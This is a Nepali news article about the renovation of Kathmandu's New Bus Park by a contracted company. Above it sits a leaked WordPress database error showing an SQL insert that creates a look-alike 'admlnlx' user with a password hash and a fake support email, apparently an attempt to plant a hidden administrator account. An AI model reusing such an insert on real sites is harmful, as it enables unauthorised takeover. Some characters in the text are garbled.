WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJsdT6yE8l4S4mxsQ3hhijjZHmCHRQ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 15:18:10', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २५ –
पछिल्ला दिनमा तपाई काठमाडौंको नयाँ बसपार्क पुग्नुभएको छ रु पुग्नुभयो भने पहिले र अहिलेको बसपार्कमा आएको परिवर्तन पक्कै महशुस गर्न पाउनुहुनेछ । अहिले नयाँ बसपार्कभित्र स(सना टहरा हटाइएका छन्, जहाँ अस्तब्यस्त र जथाभावी रुपमा ब्यापार गरिन्थ्यो । तुलनात्मक रुपमा बसपार्क सफा पनि देखिन थालेको छ ।
महानगरपालिकाले गोंगबु बसपार्क सञ्चालनको जिम्मा दिएको लोत्से बहुउद्देश्यीय प्रालिले कम्पनीले अहिले नयाँ बसकपार्कको रुप फेर्ने काम सुरु गरेको छ । निर्माण, सञ्चालन र हस्तान्तरण (बुट) प्रणाली अन्तरगत बसपार्कको स्तरीकरण सुरु भएको हो ।
अबको दुई वर्षभित्र नयाँ बसपार्क काठमाडौंको सुविधासम्पन्न बसपार्कका रुपमा परिणत हुनेछ । यसलाई अन्तर्राष्ट्रिय स्तरको बसपार्कका रुपमा विकास गर्ने लक्ष्य महानगरपालिकाले लिएको प्रमुख तथा कार्यकारी रुद्रसिंह तामाङले बताए । २ वर्षअघि ३० वर्षका लागि नयाँ बसपार्क स्तरीकरण र सञ्चालनको जिम्मा लिएको लोत्सेले पनि त्यसैअनुरुप कामको थालनी गरेको छ ।